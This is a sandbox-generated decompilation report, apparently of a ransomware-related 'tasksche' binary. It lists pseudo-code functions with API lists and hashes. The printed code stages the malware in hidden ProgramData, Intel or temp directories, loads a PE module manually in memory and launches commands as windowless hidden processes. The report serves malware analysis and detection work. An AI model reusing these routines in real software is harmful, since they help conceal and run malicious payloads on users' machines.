                                                                                				MultiByteToWideChar(0, 0, 0x40f8ac, 0xffffffff,  &_v204, 0x63);
                                                                                				GetWindowsDirectoryW( &_v1244, 0x104);
                                                                                				_v1240 = _v1240 & 0x00000000;
                                                                                				swprintf( &_v724, L"%s\\ProgramData",  &_v1244);
                                                                                				_t98 = _t94 + 0x30;
                                                                                				if(GetFileAttributesW( &_v724) == 0xffffffff) {
                                                                                					L3:
                                                                                					swprintf( &_v724, L"%s\\Intel",  &_v1244);
                                                                                					if(E00401AF6( &_v724,  &_v204, _a4) != 0 || E00401AF6( &_v1244,  &_v204, _a4) != 0) {
                                                                                						L2:
                                                                                						_t55 = 1;
                                                                                						return _t55;
                                                                                					} else {
                                                                                						GetTempPathW(0x104,  &_v724);
                                                                                						if(wcsrchr( &_v724, 0x5c) != 0) {
                                                                                							 *(wcsrchr( &_v724, 0x5c)) =  *_t69 & 0x00000000;
                                                                                						}
                                                                                						_t65 = E00401AF6( &_v724,  &_v204, _a4);
                                                                                						asm("sbb eax, eax");
                                                                                						return  ~( ~_t65);
                                                                                					}
                                                                                				}
                                                                                				_t72 = E00401AF6( &_v724,  &_v204, _a4);
                                                                                				_t98 = _t98 + 0xc;
                                                                                				if(_t72 == 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                                                                                • swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401C10
                                                                                • swprintf.MSVCRT(?,%s\Intel,?), ref: 00401C53
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 00401C97
                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CAC
                                                                                • wcsrchr.MSVCRT(?,0000005C), ref: 00401CBD
                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                  • Part of subcall function 00401AF6: CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                  • Part of subcall function 00401AF6: SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                 • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$CreateCurrentswprintfwcsrchr$AttributesByteCharFileMultiPathTempWideWindows
                                                                                • String ID: %s\Intel$%s\ProgramData
                                                                                • API String ID: 3806094219-198707228
                                                                                • Opcode ID: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                • Instruction ID: 4ac525b1174630586dc3f01422198d44c3eaba501bd80531e66e43f198221a67
                                                                                • Opcode Fuzzy Hash: e04e666ac5ff563214b472014ed4c30e25de200c4a7bf1775954a8b15fda063a
                                                                                • Instruction Fuzzy Hash: 2C41447294021DAAEF609BA0DD45FDA777CAF04310F1045BBE608F71E0EA74DA888F59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E004021E9(void* _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, void* _a32) {
                                                                                				signed int _v8;
                                                                                				intOrPtr _v40;
                                                                                				char _v44;
                                                                                				void* _t82;
                                                                                				struct HINSTANCE__* _t83;
                                                                                				intOrPtr* _t84;
                                                                                				intOrPtr _t89;
                                                                                				void* _t91;
                                                                                				void* _t104;
                                                                                				void _t107;
                                                                                				intOrPtr _t116;
                                                                                				intOrPtr _t124;
                                                                                				signed int _t125;
                                                                                				signed char _t126;
                                                                                				intOrPtr _t127;
                                                                                				signed int _t134;
                                                                                				intOrPtr* _t145;
                                                                                				signed int _t146;
                                                                                				intOrPtr* _t151;
                                                                                				intOrPtr _t152;
                                                                                				short* _t153;
                                                                                				signed int _t155;
                                                                                				void* _t156;
                                                                                				intOrPtr _t157;
                                                                                				void* _t158;
                                                                                				void* _t159;
                                                                                				void* _t160;
                                                                                
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				_t3 =  &_a8; // 0x40213f
                                                                                				if(E00402457( *_t3, 0x40) == 0) {
                                                                                					L37:
                                                                                					return 0;
                                                                                				}
                                                                                				_t153 = _a4;
                                                                                				if( *_t153 == 0x5a4d) {
                                                                                					if(E00402457(_a8,  *((intOrPtr*)(_t153 + 0x3c)) + 0xf8) == 0) {
                                                                                						goto L37;
                                                                                					}
                                                                                					_t151 =  *((intOrPtr*)(_t153 + 0x3c)) + _t153;
                                                                                					if( *_t151 != 0x4550 ||  *((short*)(_t151 + 4)) != 0x14c) {
                                                                                						goto L2;
                                                                                					} else {
                                                                                						_t9 = _t151 + 0x38; // 0x68004021
                                                                                						_t126 =  *_t9;
                                                                                						if((_t126 & 0x00000001) != 0) {
                                                                                							goto L2;
                                                                                						}
                                                                                						_t12 = _t151 + 0x14; // 0x4080e415
                                                                                						_t13 = _t151 + 6; // 0x4080e0
                                                                                						_t146 =  *_t13 & 0x0000ffff;
                                                                                						_t82 = ( *_t12 & 0x0000ffff) + _t151 + 0x18;
                                                                                						if(_t146 <= 0) {
                                                                                							L16:
                                                                                							_t83 = GetModuleHandleA("kernel32.dll");
                                                                                							if(_t83 == 0) {
                                                                                								goto L37;
                                                                                							}
                                                                                							_t84 = _a24(_t83, "GetNativeSystemInfo", 0);
                                                                                							_t159 = _t158 + 0xc;
                                                                                							if(_t84 == 0) {
                                                                                								goto L37;
                                                                                							}
                                                                                							 *_t84( &_v44);
                                                                                							_t86 = _v40;
                                                                                							_t23 = _t151 + 0x50; // 0xec8b55c3
                                                                                							_t25 = _t86 - 1; // 0xec8b55c2
                                                                                							_t27 = _t86 - 1; // -1
                                                                                							_t134 =  !_t27;
                                                                                							_t155 =  *_t23 + _t25 & _t134;
                                                                                							if(_t155 != (_v40 + _v8 - 0x00000001 & _t134)) {
                                                                                								goto L2;
                                                                                							}
                                                                                							_t31 = _t151 + 0x34; // 0x85680040
                                                                                							_t89 = _a12( *_t31, _t155, 0x3000, 4, _a32);
                                                                                							_t127 = _t89;
                                                                                							_t160 = _t159 + 0x14;
                                                                                							if(_t127 != 0) {
                                                                                								L21:
                                                                                								_t91 = HeapAlloc(GetProcessHeap(), 8, 0x3c);
                                                                                								_t156 = _t91;
                                                                                								if(_t156 != 0) {
                                                                                									 *((intOrPtr*)(_t156 + 4)) = _t127;
                                                                                									_t38 = _t151 + 0x16; // 0xc3004080
                                                                                									 *(_t156 + 0x14) =  *_t38 >> 0x0000000d & 0x00000001;
                                                                                									 *((intOrPtr*)(_t156 + 0x1c)) = _a12;
                                                                                									 *((intOrPtr*)(_t156 + 0x20)) = _a16;
                                                                                									 *((intOrPtr*)(_t156 + 0x24)) = _a20;
                                                                                									 *((intOrPtr*)(_t156 + 0x28)) = _a24;
                                                                                									 *((intOrPtr*)(_t156 + 0x2c)) = _a28;
                                                                                									 *((intOrPtr*)(_t156 + 0x30)) = _a32;
                                                                                									 *((intOrPtr*)(_t156 + 0x38)) = _v40;
                                                                                									_t54 = _t151 + 0x54; // 0x8328ec83
                                                                                									if(E00402457(_a8,  *_t54) == 0) {
                                                                                										L36:
                                                                                										E004029CC(_t156);
                                                                                										goto L37;
                                                                                									}
                                                                                									_t57 = _t151 + 0x54; // 0x8328ec83
                                                                                									_t104 = _a12(_t127,  *_t57, 0x1000, 4, _a32);
                                                                                									_t59 = _t151 + 0x54; // 0x8328ec83
                                                                                									_a32 = _t104;
                                                                                									memcpy(_t104, _a4,  *_t59);
                                                                                									_t107 =  *((intOrPtr*)(_a4 + 0x3c)) + _a32;
                                                                                									 *_t156 = _t107;
                                                                                									 *((intOrPtr*)(_t107 + 0x34)) = _t127;
                                                                                									if(E00402470(_a4, _a8, _t151, _t156) == 0) {
                                                                                										goto L36;
                                                                                									}
                                                                                									_t68 = _t151 + 0x34; // 0x85680040
                                                                                									_t111 =  *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68;
                                                                                									if( *((intOrPtr*)( *_t156 + 0x34)) ==  *_t68) {
                                                                                										_t152 = 1;
                                                                                										 *((intOrPtr*)(_t156 + 0x18)) = _t152;
                                                                                									} else {
                                                                                										 *((intOrPtr*)(_t156 + 0x18)) = E00402758(_t156, _t111);
                                                                                										_t152 = 1;
                                                                                									}
                                                                                									if(E004027DF(_t156) != 0 && E0040254B(_t156) != 0 && E0040271D(_t156) != 0) {
                                                                                										_t116 =  *((intOrPtr*)( *_t156 + 0x28));
                                                                                										if(_t116 == 0) {
                                                                                											 *((intOrPtr*)(_t156 + 0x34)) = 0;
                                                                                											L41:
                                                                                											return _t156;
                                                                                										}
                                                                                										if( *(_t156 + 0x14) == 0) {
                                                                                											 *((intOrPtr*)(_t156 + 0x34)) = _t116 + _t127;
                                                                                											goto L41;
                                                                                										}
                                                                                										_push(0);
                                                                                										_push(_t152);
                                                                                										_push(_t127);
                                                                                										if( *((intOrPtr*)(_t116 + _t127))() != 0) {
                                                                                											 *((intOrPtr*)(_t156 + 0x10)) = _t152;
                                                                                											goto L41;
                                                                                										}
                                                                                										SetLastError(0x45a);
                                                                                									}
                                                                                									goto L36;
                                                                                								}
                                                                                								_a16(_t127, _t91, 0x8000, _a32);
                                                                                								L23:
                                                                                								SetLastError(0xe);
                                                                                								L3:
                                                                                								goto L37;
                                                                                							}
                                                                                							_t127 = _a12(_t89, _t155, 0x3000, 4, _a32);
                                                                                							_t160 = _t160 + 0x14;
                                                                                							if(_t127 == 0) {
                                                                                								goto L23;
                                                                                							}
                                                                                							goto L21;
                                                                                						}
                                                                                						_t145 = _t82 + 0xc;
                                                                                						do {
                                                                                							_t157 =  *((intOrPtr*)(_t145 + 4));
                                                                                							_t124 =  *_t145;
                                                                                							if(_t157 != 0) {
                                                                                								_t125 = _t124 + _t157;
                                                                                							} else {
                                                                                								_t125 = _t124 + _t126;
                                                                                							}
                                                                                							if(_t125 > _v8) {
                                                                                								_v8 = _t125;
                                                                                							}
                                                                                							_t145 = _t145 + 0x28;
                                                                                							_t146 = _t146 - 1;
                                                                                						} while (_t146 != 0);
                                                                                						goto L16;
                                                                                					}
                                                                                				}
                                                                                				L2:
                                                                                				SetLastError(0xc1);
                                                                                				goto L3;
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 00402457: SetLastError.KERNEL32(0000000D,00402200,?!@,00000040,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402463
                                                                                • SetLastError.KERNEL32(000000C1,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402219
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0000DDB6,?,00402185,0040216E,00402185,00402198,004021A3,004021B2,00000000,0040213F,00000000), ref: 00402291
                                                                                • GetProcessHeap.KERNEL32(00000008,0000003C,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2), ref: 00402313
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 0040231A
                                                                                • memcpy.MSVCRT(00000000,?,8328EC83,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3), ref: 004023A7
                                                                                  • Part of subcall function 00402470: memset.MSVCRT(?,00000000,?), ref: 004024D5
                                                                                • SetLastError.KERNEL32(0000045A), ref: 00402430
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$Heap$AllocHandleModuleProcessmemcpymemset
                                                                                • String ID: ?!@$GetNativeSystemInfo$kernel32.dll
                                                                                • API String ID: 1900561814-3657104962
                                                                                • Opcode ID: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                • Instruction ID: 3b750285519b5b92c664dbe57bf04ddc7e4262fbacbc213f0015b22f99412f1c
                                                                                • Opcode Fuzzy Hash: 0e24c0e50799aa35dd9f5fcc36a4565fcb8133d83dc7aa1daf15d2422d00f892
                                                                                • Instruction Fuzzy Hash: 0A81AD71A01602AFDB209FA5CE49AAB77E4BF08314F10443EF945E76D1D7B8E851CB98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 91%
                                                                                			E00401AF6(WCHAR* _a4, WCHAR* _a8, wchar_t* _a12) {
                                                                                				void* _t15;
                                                                                				WCHAR* _t17;
                                                                                
                                                                                				CreateDirectoryW(_a4, 0);
                                                                                				if(SetCurrentDirectoryW(_a4) == 0) {
                                                                                					L2:
                                                                                					return 0;
                                                                                				}
                                                                                				_t17 = _a8;
                                                                                				CreateDirectoryW(_t17, 0);
                                                                                				if(SetCurrentDirectoryW(_t17) != 0) {
                                                                                					SetFileAttributesW(_t17, GetFileAttributesW(_t17) | 0x00000006);
                                                                                					if(_a12 != 0) {
                                                                                						_push(_t17);
                                                                                						swprintf(_a12, L"%s\\%s", _a4);
                                                                                					}
                                                                                					_t15 = 1;
                                                                                					return _t15;
                                                                                				}
                                                                                				goto L2;
                                                                                			}

                                                                                APIs
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B07
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B12
                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00401B1E
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00401B21
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00401B2C
                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00401B36
                                                                                • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00401B4E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$AttributesCreateCurrentFile$swprintf
                                                                                • String ID: %s\%s
                                                                                • API String ID: 1036847564-4073750446
                                                                                • Opcode ID: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                • Instruction ID: 4a0a9b6f0974b2b783bf1fd4f993800d593798a72c4fd06372b86497b3864b36
                                                                                • Opcode Fuzzy Hash: e8d223ccc4edc92c4536f1ca202ba6161fd040db7272db682552e70b0b18d917
                                                                                • Instruction Fuzzy Hash: 99F06271200208BBEB103F65DE44F9B3B2CEB457A5F015832FA46B61A1DB75A855CAB8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
			// Hidden process launcher: runs the command line _a4, optionally waits up to
			// _a8 ms (killing the child on timeout) and stores its exit code in *_a12.
			E00401064(CHAR* _a4, long _a8, DWORD* _a12) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t32;
				intOrPtr _t37;

				_t32 = 0x10;
				_v88.cb = 0x44;                                   // sizeof(STARTUPINFOA)
				memset( &(_v88.lpReserved), 0, _t32 << 2);        // zero the 0x40 bytes after cb
				_v20.hProcess = 0;
				asm("stosd");                                     // zero the remaining PROCESS_INFORMATION fields
				asm("stosd");
				asm("stosd");
				_t37 = 1;
				_v88.wShowWindow = 0;                             // SW_HIDE
				_v88.dwFlags = _t37;                              // STARTF_USESHOWWINDOW
				// 0x08000000 = CREATE_NO_WINDOW: the child gets no console window
				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20) == 0) {
					return 0;
				}
				if(_a8 != 0) {
					// anything other than WAIT_OBJECT_0 (timeout or failure) kills the child
					if(WaitForSingleObject(_v20.hProcess, _a8) != 0) {
						TerminateProcess(_v20.hProcess, 0xffffffff);
					}
					if(_a12 != 0) {
						GetExitCodeProcess(_v20.hProcess, _a12);
					}
				}
				CloseHandle(_v20.hProcess);                       // first struct member, shown by the decompiler as _v20
				CloseHandle(_v20.hThread);
				return _t37;
			}








                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 004010A8
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 004010BD
                                                                                • TerminateProcess.KERNEL32(?,000000FF), ref: 004010CC
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 004010DD
                                                                                • CloseHandle.KERNEL32(?), ref: 004010EC
                                                                                • CloseHandle.KERNEL32(?), ref: 004010F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                                                • String ID: D
                                                                                • API String ID: 786732093-2746444292
                                                                                • Opcode ID: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                • Instruction ID: fabf2a0aaa91e867d54492d1ca24e81fc8ed090543e33b3e61fa812da4358066
                                                                                • Opcode Fuzzy Hash: 520ef4afec62fe4405832db260c3c6b21caa087d375fb1c1d919acb3a27097cb
                                                                                • Instruction Fuzzy Hash: 8D116431900229ABDB218F9ADD04ADFBF79FF04720F008426F514B65A0DB708A18DAA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 81%
			// MSVC CRT startup stub (WinMainCRTStartup): initialises the C runtime, skips the
			// program name in the command line, and hands control to WinMain at L00401FE7.
			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				intOrPtr _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				intOrPtr _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;
				intOrPtr _t69;

				// register the SEH frame for the startup code
				_push(0xffffffff);
				_push(0x40d488);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);                                // _GUI_APP
				 *0x40f94c =  *0x40f94c | 0xffffffff;
				 *0x40f950 =  *0x40f950 | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x40f948; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x40f944; // 0x0
				 *_t24 = _t47;
				 *0x40f954 = _adjust_fdiv;
				_t27 = E0040793F( *_adjust_fdiv);
				_t61 =  *0x40f870; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0040793C);
				}
				E0040792A(_t27);
				_push(0x40e00c);
				_push(0x40e008);
				L00407924();                                      // _initterm(0x40e008, 0x40e00c): C initialisers
				_t29 =  *0x40f940; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x40f93c,  &_v112);
				_push(0x40e004);
				_push(0x40e000);
				L00407924();                                      // _initterm(0x40e000, 0x40e004): C++ constructors
				// skip the program name in _acmdln, honouring double quotes
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while(1) {
						__eflags =  *_t55 - 0x20;
						if(__eflags <= 0) {
							goto L7;
						}
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				L7:
				// skip whitespace between the program name and its arguments
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				_t69 = _v96.dwFlags & 0x00000001;
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;                                   // SW_SHOWDEFAULT when STARTF_USESHOWWINDOW is clear
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				// WinMain(hInstance, hPrevInstance, lpCmdLine, nShowCmd)
				_t40 = L00401FE7(_t69, GetModuleHandleA(0), 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				// SEH filter tail, unreachable after exit()
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L0040791E();
				return _t41;
			}






























                                                                                APIs
                                                                                • __set_app_type.MSVCRT(00000002), ref: 004077E7
                                                                                • __p__fmode.MSVCRT ref: 004077FC
                                                                                • __p__commode.MSVCRT ref: 0040780A
                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$__getmainargs__p__commode__p__fmode__set_app_type
                                                                                • String ID:
                                                                                • API String ID: 3626615345-0
                                                                                • Opcode ID: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                • Instruction ID: 63d29f1c4e41429a3497612c8de1f509d91e94429ea3a2aefb8dc74a018e4fb3
                                                                                • Opcode Fuzzy Hash: bfbd7971593811c7fff28e35bb39fa0d644f96314b868f8e424e213b276a966c
                                                                                • Instruction Fuzzy Hash: 51318BB1D04344AFDB20AFA5DE49F5A7BA8BB05710F10463EF541B72E0CB786805CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E00407831(CHAR* __ebx) {
                                                                                				void* _t19;
                                                                                				void _t21;
                                                                                				intOrPtr _t28;
                                                                                				signed int _t30;
                                                                                				int _t32;
                                                                                				intOrPtr* _t33;
                                                                                				intOrPtr _t34;
                                                                                				CHAR* _t35;
                                                                                				intOrPtr _t38;
                                                                                				intOrPtr* _t41;
                                                                                				void* _t42;
                                                                                
                                                                                				_t35 = __ebx;
                                                                                				__setusermatherr(E0040793C);
                                                                                				E0040792A(_t19);
                                                                                				_push(0x40e00c);
                                                                                				_push(0x40e008);
                                                                                				L00407924();
                                                                                				_t21 =  *0x40f940; // 0x0
                                                                                				 *(_t42 - 0x6c) = _t21;
                                                                                				__getmainargs(_t42 - 0x60, _t42 - 0x70, _t42 - 0x64,  *0x40f93c, _t42 - 0x6c);
                                                                                				_push(0x40e004);
                                                                                				_push(0x40e000);
                                                                                				L00407924();
                                                                                				_t41 =  *_acmdln;
                                                                                				 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                				if( *_t41 != 0x22) {
                                                                                					while(1) {
                                                                                						__eflags =  *_t41 - 0x20;
                                                                                						if(__eflags <= 0) {
                                                                                							goto L6;
                                                                                						}
                                                                                						_t41 = _t41 + 1;
                                                                                						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                					}
                                                                                				} else {
                                                                                					do {
                                                                                						_t41 = _t41 + 1;
                                                                                						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                						_t34 =  *_t41;
                                                                                					} while (_t34 != _t35 && _t34 != 0x22);
                                                                                					if( *_t41 == 0x22) {
                                                                                						L5:
                                                                                						_t41 = _t41 + 1;
                                                                                						 *((intOrPtr*)(_t42 - 0x74)) = _t41;
                                                                                					}
                                                                                				}
                                                                                				L6:
                                                                                				_t28 =  *_t41;
                                                                                				if(_t28 != _t35 && _t28 <= 0x20) {
                                                                                					goto L5;
                                                                                				}
                                                                                				 *(_t42 - 0x30) = _t35;
                                                                                				GetStartupInfoA(_t42 - 0x5c);
                                                                                				_t52 =  *(_t42 - 0x30) & 0x00000001;
                                                                                				if(( *(_t42 - 0x30) & 0x00000001) == 0) {
                                                                                					_t30 = 0xa;
                                                                                				} else {
                                                                                					_t30 =  *(_t42 - 0x2c) & 0x0000ffff;
                                                                                				}
                                                                                				_t32 = L00401FE7(_t52, GetModuleHandleA(_t35), _t35, _t41, _t30);
                                                                                				 *(_t42 - 0x68) = _t32;
                                                                                				exit(_t32);
                                                                                				_t33 =  *((intOrPtr*)(_t42 - 0x14));
                                                                                				_t38 =  *((intOrPtr*)( *_t33));
                                                                                				 *((intOrPtr*)(_t42 - 0x78)) = _t38;
                                                                                				_push(_t33);
                                                                                				_push(_t38);
                                                                                				L0040791E();
                                                                                				return _t33;
                                                                                			}


                                                                                APIs
                                                                                • __setusermatherr.MSVCRT(0040793C), ref: 00407836
                                                                                  • Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934
                                                                                • _initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
                                                                                • __getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
                                                                                • _initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
                                                                                • GetStartupInfoA.KERNEL32(?), ref: 004078BE
                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
                                                                                • exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
                                                                                • _XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904
                                                                                Memory Dump Source
                                                                                • Source File: 0000001D.00000002.353543995.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000001D.00000002.353442823.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353650721.0000000000408000.00000002.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353674626.000000000040E000.00000008.00000001.01000000.00000008.sdmp
                                                                                • Associated: 0000001D.00000002.353692061.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_29_2_400000_tasksche.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
                                                                                • String ID:
                                                                                • API String ID: 2141228402-0
